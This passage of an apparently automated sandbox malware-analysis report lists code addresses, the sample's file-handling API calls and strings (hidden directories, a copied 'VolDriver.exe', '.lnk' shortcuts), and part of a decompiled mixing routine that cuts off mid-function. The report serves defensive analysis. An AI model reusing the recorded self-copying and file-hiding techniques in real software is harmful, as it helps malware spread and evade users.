                                                                                  0x00404ef2
                                                                                  0x00404f18
                                                                                  0x00404f1c
                                                                                  0x00000000
                                                                                  0x00404f1c
                                                                                  0x00404eec
                                                                                  0x00404eec
                                                                                  0x00404f30
                                                                                  0x00404f37
                                                                                  0x00404f3e
                                                                                  0x00404f59
                                                                                  0x00404f7f
                                                                                  0x00404f9a
                                                                                  0x00404fa0
                                                                                  0x00404faf
                                                                                  0x00404fbc
                                                                                  0x00404fc2
                                                                                  0x00000000
                                                                                  0x00404fc2
                                                                                  0x00404f53
                                                                                  0x00404f53
                                                                                  0x00404fd9
                                                                                  0x00404fef
                                                                                  0x0040500d
                                                                                  0x00405034
                                                                                  0x0040503a
                                                                                  0x00405046
                                                                                  0x00405070
                                                                                  0x00405048
                                                                                  0x00405056
                                                                                  0x0040505b
                                                                                  0x0040505b
                                                                                  0x00405046
                                                                                  0x00404fef
                                                                                  0x00000000
                                                                                  0x00404fd9
                                                                                  0x00404f32
                                                                                  0x00405076
                                                                                  0x0040508a
                                                                                  0x00405099
                                                                                  0x00000000
                                                                                  0x00405099

                                                                                  APIs
                                                                                  • _chkstk.NTDLL(?,00405220,?,?,?), ref: 00404BD8
                                                                                  • wsprintfW.USER32 ref: 00404C0F
                                                                                  • wsprintfW.USER32 ref: 00404C2F
                                                                                  • wsprintfW.USER32 ref: 00404C4F
                                                                                  • wsprintfW.USER32 ref: 00404C6F
                                                                                  • wsprintfW.USER32 ref: 00404C88
                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404C98
                                                                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 00404CD1
                                                                                  • DeleteFileW.KERNEL32(?), ref: 00404CDE
                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404CEB
                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404CFC
                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00404D0F
                                                                                  • SetFileAttributesW.KERNEL32(?,00000002), ref: 00404D22
                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404D2F
                                                                                  • CopyFileW.KERNEL32(00414418,?,00000000), ref: 00404D47
                                                                                  • SetFileAttributesW.KERNEL32(?,00000002), ref: 00404D5A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$wsprintf$ExistsPath$Attributes$CopyCreateDeleteDirectory_chkstk
                                                                                  • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolDriver.exe$%s\*$shell32.dll$shell32.dll
                                                                                  • API String ID: 3833403615-1812021906
                                                                                  • Opcode ID: 62579ddd412223121d61bd6eea2e6a24c3e94b8aea53340661bac94d9f0a3f90
                                                                                  • Instruction ID: 56dfbe622999f3f4d946997a069b2a92ca57c1f224be27ae97978ead2f5811f9
                                                                                  • Opcode Fuzzy Hash: 62579ddd412223121d61bd6eea2e6a24c3e94b8aea53340661bac94d9f0a3f90
                                                                                  • Instruction Fuzzy Hash: BBD170B4900219AFCB20DF60DC44BEA77B8BF44304F0485E9F609A6290D7B99BD4CF99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 100%
                                                                                  			E00406950(intOrPtr _a4, signed int _a8) {
                                                                                  				signed int _v8;
                                                                                  				signed int _v12;
                                                                                  				signed int _v16;
                                                                                  				signed int _v24;
                                                                                  				signed int _v28;
                                                                                  				intOrPtr _v32;
                                                                                  				signed int _t1394;
                                                                                  				signed int _t1396;
                                                                                  				signed int _t1397;
                                                                                  				signed int _t1398;
                                                                                  				signed int _t1399;
                                                                                  				signed int _t1403;
                                                                                  				signed int _t1413;
                                                                                  				intOrPtr _t1414;
                                                                                  				signed int _t1424;
                                                                                  				intOrPtr _t1425;
                                                                                  				signed int _t1435;
                                                                                  				intOrPtr _t1436;
                                                                                  				signed int _t1446;
                                                                                  				intOrPtr _t1447;
                                                                                  				signed int _t1457;
                                                                                  				intOrPtr _t1458;
                                                                                  				signed int _t1468;
                                                                                  				intOrPtr _t1469;
                                                                                  				signed int _t1479;
                                                                                  				intOrPtr _t1480;
                                                                                  				signed int _t1490;
                                                                                  				intOrPtr _t1491;
                                                                                  				signed int _t1501;
                                                                                  				intOrPtr _t1502;
                                                                                  				signed int _t1512;
                                                                                  				intOrPtr _t1513;
                                                                                  				signed int _t1523;
                                                                                  				intOrPtr _t1524;
                                                                                  				signed int _t1534;
                                                                                  				intOrPtr _t1535;
                                                                                  				signed int _t1545;
                                                                                  				intOrPtr _t1546;
                                                                                  				signed int _t1556;
                                                                                  				intOrPtr _t1557;
                                                                                  				signed int _t1567;
                                                                                  				intOrPtr _t1568;
                                                                                  				signed int _t1577;
                                                                                  				intOrPtr _t1579;
                                                                                  				intOrPtr _t1580;
                                                                                  				intOrPtr _t1581;
                                                                                  				signed int _t1582;
                                                                                  				signed int _t1588;
                                                                                  				signed int _t1589;
                                                                                  				signed int _t1590;
                                                                                  				signed int _t1591;
                                                                                  				signed int _t1595;
                                                                                  				signed int _t1598;
                                                                                  				signed int _t1599;
                                                                                  				signed int _t1600;
                                                                                  				signed int _t1601;
                                                                                  				signed int _t1605;
                                                                                  				signed int _t1608;
                                                                                  				signed int _t1609;
                                                                                  				signed int _t1610;
                                                                                  				signed int _t1611;
                                                                                  				signed int _t1615;
                                                                                  				signed int _t1618;
                                                                                  				signed int _t1619;
                                                                                  				signed int _t1620;
                                                                                  				signed int _t1621;
                                                                                  				signed int _t1625;
                                                                                  				signed int _t1628;
                                                                                  				signed int _t1629;
                                                                                  				signed int _t1630;
                                                                                  				signed int _t1631;
                                                                                  				signed int _t1635;
                                                                                  				signed int _t1638;
                                                                                  				signed int _t1639;
                                                                                  				signed int _t1640;
                                                                                  				signed int _t1641;
                                                                                  				signed int _t1645;
                                                                                  				signed int _t1648;
                                                                                  				signed int _t1649;
                                                                                  				signed int _t1650;
                                                                                  				signed int _t1651;
                                                                                  				signed int _t1655;
                                                                                  				signed int _t1658;
                                                                                  				signed int _t1659;
                                                                                  				signed int _t1660;
                                                                                  				signed int _t1661;
                                                                                  				signed int _t1665;
                                                                                  				signed int _t1668;
                                                                                  				signed int _t1669;
                                                                                  				signed int _t1670;
                                                                                  				signed int _t1671;
                                                                                  				signed int _t1675;
                                                                                  				signed int _t1678;
                                                                                  				signed int _t1679;
                                                                                  				signed int _t1680;
                                                                                  				signed int _t1681;
                                                                                  				signed int _t1685;
                                                                                  				signed int _t1688;
                                                                                  				signed int _t1689;
                                                                                  				signed int _t1690;
                                                                                  				signed int _t1691;
                                                                                  				signed int _t1695;
                                                                                  				signed int _t1698;
                                                                                  				signed int _t1699;
                                                                                  				signed int _t1700;
                                                                                  				signed int _t1701;
                                                                                  				signed int _t1705;
                                                                                  				signed int _t1708;
                                                                                  				signed int _t1709;
                                                                                  				signed int _t1710;
                                                                                  				signed int _t1711;
                                                                                  				signed int _t1715;
                                                                                  				signed int _t1718;
                                                                                  				signed int _t1719;
                                                                                  				signed int _t1720;
                                                                                  				signed int _t1721;
                                                                                  				signed int _t1725;
                                                                                  				signed int _t1728;
                                                                                  				signed int _t1729;
                                                                                  				signed int _t1730;
                                                                                  				signed int _t1731;
                                                                                  				signed int _t1735;
                                                                                  				signed int _t1738;
                                                                                  				signed int _t1748;
                                                                                  				intOrPtr _t1749;
                                                                                  				intOrPtr _t1755;
                                                                                  				intOrPtr _t1756;
                                                                                  				intOrPtr _t1757;
                                                                                  				signed int _t1758;
                                                                                  				intOrPtr _t1767;
                                                                                  				intOrPtr _t1768;
                                                                                  				intOrPtr _t1769;
                                                                                  				signed int _t1770;
                                                                                  				intOrPtr _t1779;
                                                                                  				intOrPtr _t1780;
                                                                                  				intOrPtr _t1781;
                                                                                  				signed int _t1782;
                                                                                  				intOrPtr _t1791;
                                                                                  				intOrPtr _t1792;
                                                                                  				intOrPtr _t1793;
                                                                                  				signed int _t1794;
                                                                                  				intOrPtr _t1803;
                                                                                  				intOrPtr _t1804;
                                                                                  				intOrPtr _t1805;
                                                                                  				signed int _t1806;
                                                                                  				intOrPtr _t1815;
                                                                                  				intOrPtr _t1816;
                                                                                  				intOrPtr _t1817;
                                                                                  				signed int _t1818;
                                                                                  				intOrPtr _t1827;
                                                                                  				intOrPtr _t1828;
                                                                                  				intOrPtr _t1829;
                                                                                  				signed int _t1830;
                                                                                  				intOrPtr _t1839;
                                                                                  				intOrPtr _t1840;
                                                                                  				intOrPtr _t1841;
                                                                                  				signed int _t1842;
                                                                                  				intOrPtr _t1851;
                                                                                  				intOrPtr _t1852;
                                                                                  				intOrPtr _t1853;
                                                                                  				signed int _t1854;
                                                                                  				intOrPtr _t1863;
                                                                                  				intOrPtr _t1864;
                                                                                  				intOrPtr _t1865;
                                                                                  				signed int _t1866;
                                                                                  				intOrPtr _t1875;
                                                                                  				intOrPtr _t1876;
                                                                                  				intOrPtr _t1877;
                                                                                  				signed int _t1878;
                                                                                  				intOrPtr _t1887;
                                                                                  				intOrPtr _t1888;
                                                                                  				intOrPtr _t1889;
                                                                                  				signed int _t1890;
                                                                                  				intOrPtr _t1899;
                                                                                  				intOrPtr _t1900;
                                                                                  				intOrPtr _t1901;
                                                                                  				signed int _t1902;
                                                                                  				intOrPtr _t1911;
                                                                                  				intOrPtr _t1912;
                                                                                  				intOrPtr _t1913;
                                                                                  				signed int _t1914;
                                                                                  				intOrPtr _t1923;
                                                                                  				intOrPtr _t1924;
                                                                                  				intOrPtr _t1925;
                                                                                  				signed int _t1926;
                                                                                  				intOrPtr _t2043;
                                                                                  				intOrPtr _t2044;
                                                                                  				intOrPtr _t2045;
                                                                                  				intOrPtr _t2050;
                                                                                  				intOrPtr _t2051;
                                                                                  				intOrPtr _t2052;
                                                                                  				intOrPtr _t2057;
                                                                                  				intOrPtr _t2058;
                                                                                  				intOrPtr _t2059;
                                                                                  				intOrPtr _t2064;
                                                                                  				intOrPtr _t2065;
                                                                                  				intOrPtr _t2066;
                                                                                  				intOrPtr _t2071;
                                                                                  				intOrPtr _t2072;
                                                                                  				intOrPtr _t2073;
                                                                                  				intOrPtr _t2078;
                                                                                  				intOrPtr _t2079;
                                                                                  				intOrPtr _t2080;
                                                                                  				intOrPtr _t2085;
                                                                                  				intOrPtr _t2086;
                                                                                  				intOrPtr _t2087;
                                                                                  				intOrPtr _t2092;
                                                                                  				intOrPtr _t2093;
                                                                                  				intOrPtr _t2094;
                                                                                  				intOrPtr _t2099;
                                                                                  				intOrPtr _t2100;
                                                                                  				intOrPtr _t2101;
                                                                                  				intOrPtr _t2106;
                                                                                  				intOrPtr _t2107;
                                                                                  				intOrPtr _t2108;
                                                                                  				intOrPtr _t2113;
                                                                                  				intOrPtr _t2114;
                                                                                  				intOrPtr _t2115;
                                                                                  				intOrPtr _t2120;
                                                                                  				intOrPtr _t2121;
                                                                                  				intOrPtr _t2122;
                                                                                  				intOrPtr _t2127;
                                                                                  				intOrPtr _t2128;
                                                                                  				intOrPtr _t2129;
                                                                                  				intOrPtr _t2134;
                                                                                  				intOrPtr _t2135;
                                                                                  				intOrPtr _t2136;
                                                                                  				intOrPtr _t2141;
                                                                                  				intOrPtr _t2142;
                                                                                  				intOrPtr _t2143;
                                                                                  				intOrPtr _t2148;
                                                                                  				intOrPtr _t2149;
                                                                                  				intOrPtr _t2150;
                                                                                  
                                                                                  				_t1394 =  *0x411128; // 0x89abcdef
                                                                                  				_v28 = _t1394;
                                                                                  				_t1577 =  *0x41112c; // 0x1234567
                                                                                  				_v24 = _t1577;
                                                                                  				_v32 = 0;
                                                                                  				_v16 = 0x59;
                                                                                  				while(1) {
                                                                                  					_t1396 = _a8 << 4;
                                                                                  					if(_v32 >= _t1396) {
                                                                                  						break;
                                                                                  					}
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1397 = _v16;
                                                                                  					_t1579 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1579 + _t1397 * 8 - 0x2c8);
                                                                                  					_v8 = _v8 ^  *(_t1579 + _t1397 * 8 - 0x2c4);
                                                                                  					_t1398 = _v16;
                                                                                  					_t1580 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1580 + _t1398 * 8 - 0x88);
                                                                                  					_v8 = _v8 ^  *(_t1580 + _t1398 * 8 - 0x84);
                                                                                  					_t1399 = _v16;
                                                                                  					_t1581 = _a4;
                                                                                  					_t1748 = _v16;
                                                                                  					_t2043 = _a4;
                                                                                  					_v12 =  *(_t1581 + _t1399 * 8 - 0x90) &  *(_t2043 + _t1748 * 8 - 0xa8) ^ _v12;
                                                                                  					_v8 =  *(_t1581 + _t1399 * 8 - 0x8c) &  *(_t2043 + _t1748 * 8 - 0xa4) ^ _v8;
                                                                                  					_t1582 = _v16;
                                                                                  					_t1749 = _a4;
                                                                                  					_t1403 = _v16;
                                                                                  					_t2044 = _a4;
                                                                                  					_v12 =  *(_t1749 + _t1582 * 8 - 0xf8) &  *(_t2044 + _t1403 * 8 - 0x218) ^ _v12;
                                                                                  					_v8 =  *(_t1749 + _t1582 * 8 - 0xf4) &  *(_t2044 + _t1403 * 8 - 0x214) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1588 = _v16;
                                                                                  					_t2045 = _a4;
                                                                                  					 *(_t2045 + _t1588 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2045 + 4 + _t1588 * 8) = _v8 ^ _v8;
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1589 = _v16;
                                                                                  					_t1755 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1755 + _t1589 * 8 - 0x2c0);
                                                                                  					_v8 = _v8 ^  *(_t1755 + _t1589 * 8 - 0x2bc);
                                                                                  					_t1590 = _v16;
                                                                                  					_t1756 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1756 + _t1590 * 8 - 0x80);
                                                                                  					_v8 = _v8 ^  *(_t1756 + _t1590 * 8 - 0x7c);
                                                                                  					_t1591 = _v16;
                                                                                  					_t1757 = _a4;
                                                                                  					_t1413 = _v16;
                                                                                  					_t2050 = _a4;
                                                                                  					_v12 =  *(_t1757 + _t1591 * 8 - 0x88) &  *(_t2050 + _t1413 * 8 - 0xa0) ^ _v12;
                                                                                  					_v8 =  *(_t1757 + _t1591 * 8 - 0x84) &  *(_t2050 + _t1413 * 8 - 0x9c) ^ _v8;
                                                                                  					_t1758 = _v16;
                                                                                  					_t1414 = _a4;
                                                                                  					_t1595 = _v16;
                                                                                  					_t2051 = _a4;
                                                                                  					_v12 =  *(_t1414 + _t1758 * 8 - 0xf0) &  *(_t2051 + _t1595 * 8 - 0x210) ^ _v12;
                                                                                  					_v8 =  *(_t1414 + _t1758 * 8 - 0xec) &  *(_t2051 + _t1595 * 8 - 0x20c) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1598 = _v16;
                                                                                  					_t2052 = _a4;
                                                                                  					 *(_t2052 + 8 + _t1598 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2052 + 0xc + _t1598 * 8) = _v8 ^ _v8;
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1599 = _v16;
                                                                                  					_t1767 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1767 + _t1599 * 8 - 0x2b8);
                                                                                  					_v8 = _v8 ^  *(_t1767 + _t1599 * 8 - 0x2b4);
                                                                                  					_t1600 = _v16;
                                                                                  					_t1768 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1768 + _t1600 * 8 - 0x78);
                                                                                  					_v8 = _v8 ^  *(_t1768 + _t1600 * 8 - 0x74);
                                                                                  					_t1601 = _v16;
                                                                                  					_t1769 = _a4;
                                                                                  					_t1424 = _v16;
                                                                                  					_t2057 = _a4;
                                                                                  					_v12 =  *(_t1769 + _t1601 * 8 - 0x80) &  *(_t2057 + _t1424 * 8 - 0x98) ^ _v12;
                                                                                  					_v8 =  *(_t1769 + _t1601 * 8 - 0x7c) &  *(_t2057 + _t1424 * 8 - 0x94) ^ _v8;
                                                                                  					_t1770 = _v16;
                                                                                  					_t1425 = _a4;
                                                                                  					_t1605 = _v16;
                                                                                  					_t2058 = _a4;
                                                                                  					_v12 =  *(_t1425 + _t1770 * 8 - 0xe8) &  *(_t2058 + _t1605 * 8 - 0x208) ^ _v12;
                                                                                  					_v8 =  *(_t1425 + _t1770 * 8 - 0xe4) &  *(_t2058 + _t1605 * 8 - 0x204) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1608 = _v16;
                                                                                  					_t2059 = _a4;
                                                                                  					 *(_t2059 + 0x10 + _t1608 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2059 + 0x14 + _t1608 * 8) = _v8 ^ _v8;
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1609 = _v16;
                                                                                  					_t1779 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1779 + _t1609 * 8 - 0x2b0);
                                                                                  					_v8 = _v8 ^  *(_t1779 + _t1609 * 8 - 0x2ac);
                                                                                  					_t1610 = _v16;
                                                                                  					_t1780 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1780 + _t1610 * 8 - 0x70);
                                                                                  					_v8 = _v8 ^  *(_t1780 + _t1610 * 8 - 0x6c);
                                                                                  					_t1611 = _v16;
                                                                                  					_t1781 = _a4;
                                                                                  					_t1435 = _v16;
                                                                                  					_t2064 = _a4;
                                                                                  					_v12 =  *(_t1781 + _t1611 * 8 - 0x78) &  *(_t2064 + _t1435 * 8 - 0x90) ^ _v12;
                                                                                  					_v8 =  *(_t1781 + _t1611 * 8 - 0x74) &  *(_t2064 + _t1435 * 8 - 0x8c) ^ _v8;
                                                                                  					_t1782 = _v16;
                                                                                  					_t1436 = _a4;
                                                                                  					_t1615 = _v16;
                                                                                  					_t2065 = _a4;
                                                                                  					_v12 =  *(_t1436 + _t1782 * 8 - 0xe0) &  *(_t2065 + _t1615 * 8 - 0x200) ^ _v12;
                                                                                  					_v8 =  *(_t1436 + _t1782 * 8 - 0xdc) &  *(_t2065 + _t1615 * 8 - 0x1fc) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1618 = _v16;
                                                                                  					_t2066 = _a4;
                                                                                  					 *(_t2066 + 0x18 + _t1618 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2066 + 0x1c + _t1618 * 8) = _v8 ^ _v8;
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1619 = _v16;
                                                                                  					_t1791 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1791 + _t1619 * 8 - 0x2a8);
                                                                                  					_v8 = _v8 ^  *(_t1791 + _t1619 * 8 - 0x2a4);
                                                                                  					_t1620 = _v16;
                                                                                  					_t1792 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1792 + _t1620 * 8 - 0x68);
                                                                                  					_v8 = _v8 ^  *(_t1792 + _t1620 * 8 - 0x64);
                                                                                  					_t1621 = _v16;
                                                                                  					_t1793 = _a4;
                                                                                  					_t1446 = _v16;
                                                                                  					_t2071 = _a4;
                                                                                  					_v12 =  *(_t1793 + _t1621 * 8 - 0x70) &  *(_t2071 + _t1446 * 8 - 0x88) ^ _v12;
                                                                                  					_v8 =  *(_t1793 + _t1621 * 8 - 0x6c) &  *(_t2071 + _t1446 * 8 - 0x84) ^ _v8;
                                                                                  					_t1794 = _v16;
                                                                                  					_t1447 = _a4;
                                                                                  					_t1625 = _v16;
                                                                                  					_t2072 = _a4;
                                                                                  					_v12 =  *(_t1447 + _t1794 * 8 - 0xd8) &  *(_t2072 + _t1625 * 8 - 0x1f8) ^ _v12;
                                                                                  					_v8 =  *(_t1447 + _t1794 * 8 - 0xd4) &  *(_t2072 + _t1625 * 8 - 0x1f4) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1628 = _v16;
                                                                                  					_t2073 = _a4;
                                                                                  					 *(_t2073 + 0x20 + _t1628 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2073 + 0x24 + _t1628 * 8) = _v8 ^ _v8;
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1629 = _v16;
                                                                                  					_t1803 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1803 + _t1629 * 8 - 0x2a0);
                                                                                  					_v8 = _v8 ^  *(_t1803 + _t1629 * 8 - 0x29c);
                                                                                  					_t1630 = _v16;
                                                                                  					_t1804 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1804 + _t1630 * 8 - 0x60);
                                                                                  					_v8 = _v8 ^  *(_t1804 + _t1630 * 8 - 0x5c);
                                                                                  					_t1631 = _v16;
                                                                                  					_t1805 = _a4;
                                                                                  					_t1457 = _v16;
                                                                                  					_t2078 = _a4;
                                                                                  					_v12 =  *(_t1805 + _t1631 * 8 - 0x68) &  *(_t2078 + _t1457 * 8 - 0x80) ^ _v12;
                                                                                  					_v8 =  *(_t1805 + _t1631 * 8 - 0x64) &  *(_t2078 + _t1457 * 8 - 0x7c) ^ _v8;
                                                                                  					_t1806 = _v16;
                                                                                  					_t1458 = _a4;
                                                                                  					_t1635 = _v16;
                                                                                  					_t2079 = _a4;
                                                                                  					_v12 =  *(_t1458 + _t1806 * 8 - 0xd0) &  *(_t2079 + _t1635 * 8 - 0x1f0) ^ _v12;
                                                                                  					_v8 =  *(_t1458 + _t1806 * 8 - 0xcc) &  *(_t2079 + _t1635 * 8 - 0x1ec) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1638 = _v16;
                                                                                  					_t2080 = _a4;
                                                                                  					 *(_t2080 + 0x28 + _t1638 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2080 + 0x2c + _t1638 * 8) = _v8 ^ _v8;
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1639 = _v16;
                                                                                  					_t1815 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1815 + _t1639 * 8 - 0x298);
                                                                                  					_v8 = _v8 ^  *(_t1815 + _t1639 * 8 - 0x294);
                                                                                  					_t1640 = _v16;
                                                                                  					_t1816 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1816 + _t1640 * 8 - 0x58);
                                                                                  					_v8 = _v8 ^  *(_t1816 + _t1640 * 8 - 0x54);
                                                                                  					_t1641 = _v16;
                                                                                  					_t1817 = _a4;
                                                                                  					_t1468 = _v16;
                                                                                  					_t2085 = _a4;
                                                                                  					_v12 =  *(_t1817 + _t1641 * 8 - 0x60) &  *(_t2085 + _t1468 * 8 - 0x78) ^ _v12;
                                                                                  					_v8 =  *(_t1817 + _t1641 * 8 - 0x5c) &  *(_t2085 + _t1468 * 8 - 0x74) ^ _v8;
                                                                                  					_t1818 = _v16;
                                                                                  					_t1469 = _a4;
                                                                                  					_t1645 = _v16;
                                                                                  					_t2086 = _a4;
                                                                                  					_v12 =  *(_t1469 + _t1818 * 8 - 0xc8) &  *(_t2086 + _t1645 * 8 - 0x1e8) ^ _v12;
                                                                                  					_v8 =  *(_t1469 + _t1818 * 8 - 0xc4) &  *(_t2086 + _t1645 * 8 - 0x1e4) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1648 = _v16;
                                                                                  					_t2087 = _a4;
                                                                                  					 *(_t2087 + 0x30 + _t1648 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2087 + 0x34 + _t1648 * 8) = _v8 ^ _v8;
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1649 = _v16;
                                                                                  					_t1827 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1827 + _t1649 * 8 - 0x290);
                                                                                  					_v8 = _v8 ^  *(_t1827 + _t1649 * 8 - 0x28c);
                                                                                  					_t1650 = _v16;
                                                                                  					_t1828 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1828 + _t1650 * 8 - 0x50);
                                                                                  					_v8 = _v8 ^  *(_t1828 + _t1650 * 8 - 0x4c);
                                                                                  					_t1651 = _v16;
                                                                                  					_t1829 = _a4;
                                                                                  					_t1479 = _v16;
                                                                                  					_t2092 = _a4;
                                                                                  					_v12 =  *(_t1829 + _t1651 * 8 - 0x58) &  *(_t2092 + _t1479 * 8 - 0x70) ^ _v12;
                                                                                  					_v8 =  *(_t1829 + _t1651 * 8 - 0x54) &  *(_t2092 + _t1479 * 8 - 0x6c) ^ _v8;
                                                                                  					_t1830 = _v16;
                                                                                  					_t1480 = _a4;
                                                                                  					_t1655 = _v16;
                                                                                  					_t2093 = _a4;
                                                                                  					_v12 =  *(_t1480 + _t1830 * 8 - 0xc0) &  *(_t2093 + _t1655 * 8 - 0x1e0) ^ _v12;
                                                                                  					_v8 =  *(_t1480 + _t1830 * 8 - 0xbc) &  *(_t2093 + _t1655 * 8 - 0x1dc) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1658 = _v16;
                                                                                  					_t2094 = _a4;
                                                                                  					 *(_t2094 + 0x38 + _t1658 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2094 + 0x3c + _t1658 * 8) = _v8 ^ _v8;
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1659 = _v16;
                                                                                  					_t1839 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1839 + _t1659 * 8 - 0x288);
                                                                                  					_v8 = _v8 ^  *(_t1839 + _t1659 * 8 - 0x284);
                                                                                  					_t1660 = _v16;
                                                                                  					_t1840 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1840 + _t1660 * 8 - 0x48);
                                                                                  					_v8 = _v8 ^  *(_t1840 + _t1660 * 8 - 0x44);
                                                                                  					_t1661 = _v16;
                                                                                  					_t1841 = _a4;
                                                                                  					_t1490 = _v16;
                                                                                  					_t2099 = _a4;
                                                                                  					_v12 =  *(_t1841 + _t1661 * 8 - 0x50) &  *(_t2099 + _t1490 * 8 - 0x68) ^ _v12;
                                                                                  					_v8 =  *(_t1841 + _t1661 * 8 - 0x4c) &  *(_t2099 + _t1490 * 8 - 0x64) ^ _v8;
                                                                                  					_t1842 = _v16;
                                                                                  					_t1491 = _a4;
                                                                                  					_t1665 = _v16;
                                                                                  					_t2100 = _a4;
                                                                                  					_v12 =  *(_t1491 + _t1842 * 8 - 0xb8) &  *(_t2100 + _t1665 * 8 - 0x1d8) ^ _v12;
                                                                                  					_v8 =  *(_t1491 + _t1842 * 8 - 0xb4) &  *(_t2100 + _t1665 * 8 - 0x1d4) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1668 = _v16;
                                                                                  					_t2101 = _a4;
                                                                                  					 *(_t2101 + 0x40 + _t1668 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2101 + 0x44 + _t1668 * 8) = _v8 ^ _v8;
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1669 = _v16;
                                                                                  					_t1851 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1851 + _t1669 * 8 - 0x280);
                                                                                  					_v8 = _v8 ^  *(_t1851 + _t1669 * 8 - 0x27c);
                                                                                  					_t1670 = _v16;
                                                                                  					_t1852 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1852 + _t1670 * 8 - 0x40);
                                                                                  					_v8 = _v8 ^  *(_t1852 + _t1670 * 8 - 0x3c);
                                                                                  					_t1671 = _v16;
                                                                                  					_t1853 = _a4;
                                                                                  					_t1501 = _v16;
                                                                                  					_t2106 = _a4;
                                                                                  					_v12 =  *(_t1853 + _t1671 * 8 - 0x48) &  *(_t2106 + _t1501 * 8 - 0x60) ^ _v12;
                                                                                  					_v8 =  *(_t1853 + _t1671 * 8 - 0x44) &  *(_t2106 + _t1501 * 8 - 0x5c) ^ _v8;
                                                                                  					_t1854 = _v16;
                                                                                  					_t1502 = _a4;
                                                                                  					_t1675 = _v16;
